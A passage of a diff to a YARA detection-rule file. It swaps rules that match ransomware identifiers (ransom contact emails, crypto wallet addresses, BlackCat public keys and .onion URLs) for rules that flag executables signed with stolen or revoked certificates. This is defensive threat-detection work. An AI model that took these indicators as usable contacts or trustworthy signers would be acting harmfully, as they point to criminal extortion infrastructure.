+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Zeppelin
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C6D7Ad852Af211Bf48F19Cc0242Dcd72 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Zeppelin ransomware"
-		author = "ditekShen"
-		id = "f3bbfcd0-c66c-589e-ae04-904314d6a869"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "1aca90d4-6cb6-5bcd-a4c9-e8f8cddc0d04"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L449-L462"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4296-L4307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "66dd92423cfac32de4bea95ad0c9594cb449dc897cc6315d782c1db6de7dc5b1"
+		logic_hash = "e10de48bfa1edec81157eb95ef3478346c22dd6f7ef163e30887d3c7bb580c5e"
 		score = 75
-		quality = 63
-		tags = ""
-
-	strings:
-		$s1 = "kd8eby0@inboxhub.net" ascii wide nocase
-		$s2 = "kd8eby0@onionmail.org" ascii wide nocase
-		$s3 = "kd8eby0@nuke.africa" ascii wide nocase
-		$s4 = "uspex1@cock.li" ascii wide nocase
-		$s5 = "uspex2@cock.li" ascii wide nocase
-		$s6 = "China.Helper@aol.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "bddcef09f222ea4270d4a1811c10f4fcf98e4125"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APDZQKILIIQVIJSCTY" and pe.signatures [ i ] . serial == "c6:d7:ad:85:2a:f2:11:bf:48:f1:9c:c0:24:2d:cd:72" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_STOP
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0084888D5A12228E8950683Ecdab62Fe7A : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with STOP ransomware"
-		author = "ditekShen"
-		id = "b2279a7f-a187-5a44-bf1f-87c21b3ffa4f"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "5036d604-55df-565a-b6db-c788da007ea8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L464-L480"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4309-L4320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0d902edbcbe8ff8f3a751b649554499933b06471920c86a9eea3de23890b4bc"
+		logic_hash = "4deda791923cdacccf57d54651ca44bd8c04d053a11ccf5700354f9f37be17de"
 		score = 75
-		quality = 57
-		tags = ""
-
-	strings:
-		$s1 = "gorentos@bitmessage.ch" ascii wide nocase
-		$s2 = "gorentos2@firemail.cc" ascii wide nocase
-		$s3 = "manager@mailtemp.ch" ascii wide nocase
-		$s4 = "helprestoremanager@airmail.cc" ascii wide nocase
-		$s5 = "supporthelp@airmail.cc" ascii wide nocase
-		$s6 = "managerhelper@airmail.cc" ascii wide nocase
-		$s7 = "helpteam@mail.ch" ascii wide nocase
-		$s8 = "helpmanager@airmail.cc" ascii wide nocase
-		$s9 = "support@sysmail.ch" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "390b23ed9750745e8441e35366b294a2a5c66fcd"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ub30 Limited" and pe.signatures [ i ] . serial == "00:84:88:8d:5a:12:22:8e:89:50:68:3e:cd:ab:62:fe:7a" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Diavol
+
+rule DITEKSHEN_INDICATOR_KB_CERT_709D547A2F09D39C4C2334983F2Cbf50 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Diavol ransomware"
-		author = "ditekShen"
-		id = "ea499318-ed5b-5597-8f9f-4ece7942cf4b"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "e3b2ab8b-be90-5593-843f-59f2d626e604"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L482-L491"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4322-L4333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72f4d7854f7ba813c4872d47aad69edb8c2927f380b9213ced1aca52454eee5"
+		logic_hash = "f45a2047181f3f07a8fb9cc00aafc31ba7aa369fc5c0165557757306a0de0d44"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "/noino.5fws6uqv5byttg2r//:sptth" ascii wide nocase
-		$s2 = "https://r2gttyb5vqu6swf5.onion/" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f10095c5e36e6bce0759f52dd11137756adc3b53"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BMUZVYUGWSQWLAIISX" and pe.signatures [ i ] . serial == "70:9d:54:7a:2f:09:d3:9c:4c:23:34:98:3f:2c:bf:50" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Chaos
+
+rule DITEKSHEN_INDICATOR_KB_CERT_98A04Ea05E8A949A4D880D0136794Df3 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Chaos ransomware"
-		author = "ditekShen"
-		id = "18476655-1468-569e-b518-ebeaf289fbd6"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "cda10dcf-bc46-56d9-a4b5-60a76249334c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L493-L511"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4335-L4346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e8dce1622dbccca6aa15040b49fc9ea05ec7192f8a79409fd7414690102d09a"
+		logic_hash = "05c63386558b954da3cfec1fd514a7a567189d9ac33d818cbbabf3eaf72ed130"
 		score = 75
-		quality = 67
-		tags = ""
-
-	strings:
-		$s1 = "anenomous31@gmail.com" ascii wide nocase
-		$s2 = "daengsocietyteam@gmail.com" ascii wide nocase
-		$s3 = "RansHelp@tutanota.com" ascii wide nocase
-		$s4 = "18vhBpgPhZrjJkbuT2ZyUXAnJavaJcTwEd" ascii wide
-		$s5 = "bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0" ascii wide
-		$s6 = "8AFtPnreZp28xoetUyKiQvVtwrov9PtEbMyvczdNZpBN45EUbEsrE8xYVp4NNqPrtxNjQwn3PbW3FG16EPYcPpKzMU78xN6" ascii wide
-		$s7 = "bc1qu6tharwawwny28z9fj6nrxg5cqftaep9ap6z2v" ascii wide
-		$s8 = "bambolina2021@virgilio.it" ascii wide nocase
-		$s9 = "1EoyuvcXdAQQvStkoJZ38vdGm84StD7wjm" ascii wide
-		$s10 = "1G395PJs8ciqvXPZEYb1LfUGPix9h9n3oQ" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "0387ce856978cfa3e161fc03751820f003b478f3"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRVFMPRLNIMAMSUIMT" and pe.signatures [ i ] . serial == "98:a0:4e:a0:5e:8a:94:9a:4d:88:0d:01:36:79:4d:f3" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Maze
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2355895F1759E9E3648026F4 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Maze ransomware"
-		author = "ditekShen"
-		id = "7cc11912-e5d2-5477-ab9b-0c470bb5e1d6"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "d716ed7f-8886-587d-a868-805da13bb925"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L513-L521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4348-L4360"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "46070d46c502837e5fb87d0fb75244a1a21e90b4e0ce4b73c408b8dc67fe1bcb"
+		logic_hash = "429375af70872755ab2d517b125042795c9a20238405a4af5b0caecc46a3f563"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "getmyfilesback@airmail.cc" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f46d457898d436769f0c70127044e2019583ee16"
+		hash1 = "f4f4a5953d0c87db611fa05bb51672591295049978a0e9e14eca8224254ecd7a"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "23:55:89:5f:17:59:e9:e3:64:80:26:f4" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lokilocker
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00818631110B5D14331Dac7E6Ad998B902 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LokiLocker ransomware"
-		author = "ditekShen"
-		id = "ab2cf390-4544-54ed-913c-d463d0f1bdb0"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "15efa9cf-5457-5b04-abee-8f86721c5d56"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L523-L531"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4376-L4390"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ab9a2ce7e39d916b389e2adb975e3558ddb7d87f7e9494e6b20cb25edd3cb84"
+		logic_hash = "ee82090ceb1378b44c283586d0f0b6ec0d9779fab2497b0168acec8e5546a4a8"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "Unlockpls.dr01@yahoo.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "c93082334ef8c2d6a0a1823cdf632c0d75d56377"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackcat
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ab21306B11Ff280A93Fc445876988Ab : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with BlackCat ransomware"
-		author = "ditekShen"
-		id = "21038f8e-73cd-59d2-9eb3-6947d263ab79"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "583fccef-3ad5-5f9a-a030-d6bf9ebed00f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L533-L569"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4392-L4403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eb0a4d26170f030775f778cc524749ca283dfa983f84bd364e4df6321eb96cf1"
+		logic_hash = "aa93d36d472d24cdd937c323ffa048fc71984fcf8a13400618ec8a0f2c172fc0"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$pk1 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0B0ni9tyKHSJmU6gc1iRwNTklYocRKmLPUyOthUIHnZHwL1M2pKlMBwXx81bboVS6Cf8YaCoWW1bCmLwPX421sG22xkmtMy/SfiG8jaYtYiA7r7hOdIUnJgRo6vDvNafZlSD32tFVVjuX8Ec79qj2FM7/MmNcseUgpIQaEACuZcSzMK+jZA4BLT9b5Akkec2hPOXGTPmgaXjL9EJE+0rhNZcm/m6xe4/S5eL2kSCVsNUeG8xWuSO2kDRS8xY3rtJOCNEdqZp1rxzTkhgj3hHqr7AoFAkxNblQ538JcdF5+CGINxckA/ldmP7wQd92tmFk2vcl2WeQykFwMM6L6MsQwIDAQAB" ascii wide
-		$pk2 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA49gzJwP9UwEuYQZT1cdgSpxG6z8TVNLPfS4Qwd3vpWHEOAuvi8JGVEpHPGZnrD1QFoDLSTva3PZ4mqtIVO79GOYb5uQkP7LdJGWbLAjUGptVGmB67jKOOLLrjmuBDHpJXSOGG/vw5vajr4MhNnsvoBLPOC0AOzPM6GBDgKdC9zdUGNEreAjOR4neqwZ2jfYl5k5e3eRF86hmWhGXJQaU1uTmDJwgQIzmUZKo+YCfAHbEbSA4HhsumJfw0MJN7RfKPEQkEVvRIBibHnJuIp1bxk3IGPzTCbyQLHMVLz8wgElEexu8/aO3FT6w4uPY3qD+r2W+ri7xIdEN/pTz6TBKvwIDAQAB" ascii wide
-		$pk3 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tKPNFCbU5Unr9jxlTk4RmUdVhcRydJFts6hMpLzcAXIR2yxiNC0QiF4UovAIpGwX6kxOW7kOaOvABJQP6QENMNSg030VlLoTP+ndfFwIt+X+RUflG4UWPE8yu+kzGpCwp7UjX+hD/SpFbSFRRh3BvL3vEq04DzE0AzifEBE4yxKpLsrMsXyZzWy9Nza8NTO2jrBxoEVM2xCLkULp0wZEPDwgeKGkoxMzqavVWBC+Vxi0atKstbo7/TloNenPagl/eUErk9C8tT67zKgbEh3TFtREgaxa/yrjBvN48BU8JGGxLxy4AeGF0vOUdD0WkJsWYzLVg21ApgJaCDr5zDPuQIDAQAB" ascii wide
-		$pk4 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApw3tWdMaWJvNf2Mejy5H0Y6kuj+lstNpwFyismGDEYhWKPps9c68xl+84o6uLKfqPzNvLnSxlVa6DitcJGeKJEQkzN+C1e1KsfzM63jHybREB2hs+dHbqBq4dbamIQcTrrr4mKzuHJ7aok4mlpRx2Un1XOJaodoV7xOHO7ui5v6uK39MJ3rvitSEBvv5oI0WDlp3IFmtd6UM6r2nygY1ncAUuasalZgF1Vaz7VXOWyX2ReQHbYWWRCR1qyKMQcBtjT5POXx9B8ek1pnU4p65kGe9M794Bhhh20GN24gY5a+zwXwstaNTO9luwd4xjjRQAVsDgjrjkzti27G11ICn6wIDAQAB" ascii wide
-		$pk5 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq8kj5LQJngPsY7AhTaJsUXc5FrSGeKS5gw5PIqk2QPM9TY6+us8TRRzWZ7rGk1zns2klpzpRMUzLIqB8lpCkJjqkOUGfgqs+HN4VIOpoJgFY897xstJCxTc+8pYQEsSqClxJllscU0okkLSQqndIR2Gznlg3qfcwyncJAFBInyqM+L4kbwCQZ6x5HNiLe2lJn8RP2aDiMI+RS1uLYron2G7rxDTUQnxThMtgLAeko8ulaB3TpB0g4lmHCenkEZeBNs81986+MjHnv7KkiscZ7ZrezKjNaIxRs8BAcD9y+Q9QQxCvZMS01ITNXcgiItbA4dsGq1fPJ42yBkkiIodsEQIDAQAB" ascii wide
-		$pk6 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqEoytNrMZRoqyIsFpcjiqVWpuV+cC9jS1umXNg/AnJF/xE7LONAmb1p8Dsx1igIUd65IXfFUxmJjFO5hf8LIBzvjUbBll4lbSgGTAUHa3Jbmr/imle6QftmY32J7dDb4WuJUOx+vLNT0I72CESiyotSzwgvLwjyubTmzTJMkqviYOcgDj45NVOx669cG6FWEaJo3PUZzRx9LS6pkOn8tW+W4NzmHMcrma+LOakan7NU6Khv5Hf5ARNsAA+KvDfP1WXJ/VsLXj6x8SdX0v2iS+y58ehUUmlxc8HNsYdOGFwrwYX9zLyJDedsbPg02c4AE4KXt8vH4+j4lVFtruSy4vwIDAQAB" ascii wide
-		$pk7 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt9uYkHzaizNXg/S11ncTTLybkMtqrKW8gg6TyzbGWnRNROl9O+l1VZBLG0xiMt1mZbuStl8Lt3l1vlkMa92kgLjN+UfKmq3KhBEheN2uMmR0WpwV83kceVRmzr5lug4RyQ/xA6/OXK4NptDIT4L6CUTBWMyk2mmY0Cq9HyyrjdnHeAXWAcQGFEac7W4jTjONZqI+lgScPewS+cPFnz1hAD0IAqzj5X2mZVSfFGR3tDoIe42jw5wb6W2yi8zb3mgKrGtTBbw0Ppj0UgKrmdN5iFmfUQHLEzKAakDggLcBtrW1o5+4WMaZOLw8maU5byvjXu3F3i3GdQe8SKTYcVK5OQIDAQAB" ascii wide
-		$pk8 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAugqZ4ATE9+9FqununW/DBvGosnUX/bNxQzMYUmE14GJIbNa6vwYSNXOlG09mvdAqZqD3lXihWDjy25+gzqSeS+Fs2qNyTdfGPA8iu2xx5RRUXKLGFThxtIzg3fohAK3+LxJVhxtuITAT38IHacc7dVLHsrddu4UDjiHGFdvXjB55Nwe5cu1BYylHsARMYycBA2FwLP57cKvc2/C3OXBAF6qbsVXBcyFhrKOOYA/+5IjFfEhgHy2FLHRf8lmPQPbSlrM6dk+W4D5KVqOPx/eFp0geUJJlmlre3flI29qWS20bkGqAEz9j07y69HGYN9Nt7+DRgBwrpNo/EkZkuaSTtQIDAQAB" ascii wide
-		$pk9 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuuAQlnowSGaSi2XgnwaHQAFZ6e7C0SwpAyyLTncJ4l5cwFbM+mwnV+iV3a+ert8WqOmW1aKOCjTPXrXNoirQgboVpLfhIIT1uOOss4O8lodRxgB6QrLCI7PYMZ+8VgIdEPPzsjmTFLxFc7DERxnSjhGdRQIjZNjm7bGScJD0MayDL9KTkVdJtC+C9n5dwEwg6XtQbwLDeaGZaByOgB/zR6tlcPQCNU9rj1qfcVrI/dFW4br/NnJbqrH714z+dvCa18IJTcu3kW74CAilvHrl5qFDd8CCQhjLrjQDPxAoCba9aXKr6dwt34/MU0tVRTYjzMAxR4yTh3oEjVT+HifvVwIDAQAB" ascii wide
-		$pk10 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwcPjnPl8bI1A0iudX70FKkTjnLjHyetHN2kAIcyOG10K8vm67n/Ma9mAnoDggD3D6UtAbwjvHwPW1m9WF+MrnBXmBizE0JpwOLtVFcHeVLJXlYn/C5RNZziTCwjauH6TlT7Mo/oHfg7nX4IXEuaeAZz8g9ioeJ1Lydi9ZZM1gmdNk8KuKR0zrrJ6MMAGrhMtblLFVwtMn7IlNjT/BgSL4pDyNa++wI5P4R2rMykJwGu/7o2kKE2IFimtFDyZ5a+CX46cdKt7uo5eKFiqf/jTes9/y5AgoS69mt4fRvWFhP7qHXRO2gG8XAc+9suhiuVUWZTAu3xXz5VsmBtk8pzcpwIDAQAB" ascii wide
-		$pk11 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwMQXFMtYf60KrbUVwNVoPhhrCTNMY3Zv+/WULZRZfJ4dMhYozDxtRVdtBDKtuYuHCGLu/Ymf9wKFFXgVH3En7qI1sU2UdjNR4086X8oSTMUn/GwEAEIZAHtSFuk6AXcXW+eO0yxPF+lt5AZcNnJocWBVZ8RWGvsQdtGgtZalttAynROC4RUGkvD1h1ssMteHWneFLpfzSPGlbu0s0cemsrTPmhexGIenup/YjNdmhbfvvYE9kZfPebGtZHw6oQXWcG7sAlvkGciJl3Eo9FznNj0K+v8WQW5L/UbosZaYVJbxlbtySvqUqZbkLKsmp91tr9bvTiDMZuXZS7iHVqchUQIDAQAB" ascii wide
-		$pk12 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbKVxwYe4PpnPm0XtuqShDqFWCFRBw0tYo2vmLwVPlwa+0+ox8+nF0mzWC3ZZT2XkGSodszosOoocfKAwOjQnA+4/Hokl4hgG6K8O7wWuWlvgo4fkcZShy2cMY9FaC6e4bMfurlDFt7OVrKKWAyEGv49Etq6LNoyl5ddM/XmspG52gscRoIcOTwBL4bD8nVcamZXqE4j2mS62HicQ6q9YgRVs1PLbgVPbg8c2rFzpN1e8wZdPtvyGON0m3CmxsYa63yianbnBAS4WnxEnoI7eCZZNkblr+kZB4J9War5VYHu9lFw4XWeuHget/Rn8oGCJOMHkZMz23NpUVaX9htQAwIDAQAB" ascii wide
-		$url1 = "://zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
-		$url2 = "://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion" ascii wide
-		$url3 = "://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion" ascii wide
-		$url4 = "://aoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd.onion" ascii wide
-		$url5 = "://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion" ascii wide
-		$url6 = "://b6v4ojs7jfvftvcoagjxp7qz33yeljydqy6afzsh26vqbzcjwz4b3zad.onion" ascii wide
-		$url7 = "://htnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd.onion" ascii wide
-		$url8 = "://id7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad.onion" ascii wide
-		$url9 = "://mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
-		$url10 = "://odf3dt34tkqndw5h2l5gt2gwwd3jct5rwwjusbd3vlin2jueyv2qkgid.onion" ascii wide
-		$url11 = "://rfosusl6qdm4zhoqbqnjxaloprld2qz35u77h4aap46rhwkouejsooqd.onion" ascii wide
-		$url12 = "://sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion" ascii wide
-		$url13 = "://xqoykemmcivwtpxh3a6pu3w7sstr2y7hapxdiv4caaxidurmwwbjx2id.onion" ascii wide
-		$url14 = "://y4722ss64vel5hmph75te7lx2x5xz463322ypjirm5ytxviijtdpybid.onion" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "6d0d10933b355ee2d8701510f22aff4a06adbe5b"
+		importance = 20
 
 	condition:
-		(1 of ( $pk* ) and 1 of ( $url* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Koxic
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0086909B91F07F9316984D888D1E28Ab76 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LokiLocker ransomware"
-		author = "ditekShen"
-		id = "4c4ff722-cac1-5967-9e79-681f47566e96"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "58b191cc-82f2-5ad3-8d1e-91c7528880c6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L571-L580"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4405-L4416"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4d0e85cf4c7a134609262e21d5cef98100ba0a046d17ffe51bf3975dc7cae9"
+		logic_hash = "eb8807437edbbba52a928de4ebf0a25513127bd9800088e0d85e41c8375a05b1"
 		score = 75
-		quality = 73
-		tags = ""
-
-	strings:
-		$s1 = "wilhelmkox@tutanota.com" ascii wide nocase
-		$s2 = "F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "5eba3c38e989c7d16c987e2989688d3bd24032bc"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryuk
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Ryuk ransomware"
-		author = "ditekShen"
-		id = "00cf99da-ff3c-5c91-8966-69a8afc8613a"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "d96df78b-3824-5f94-8a32-87dfd9cd585f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L582-L592"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4418-L4429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2b6106fc49dd254ca936e285fa0c2a3aee7110832686638d20d369d77f6c48f"
+		logic_hash = "845abc1f08a4d56b32477fbe8855f45633833c68f4255d0690f10cc23c167e84"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "WayneEvenson@protonmail.com" ascii wide nocase
-		$s2 = "WayneEvenson@tutanota.com" ascii wide nocase
-		$s3 = "14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "10d82c75a1846ebfb2a0d1abe9c01622bdfabf0a"
+		importance = 20
 
 	condition:
-		any of them
